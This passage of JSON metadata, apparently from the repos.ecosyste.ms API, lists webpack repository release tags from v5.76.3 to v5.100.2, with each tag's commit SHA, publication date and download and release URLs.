.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f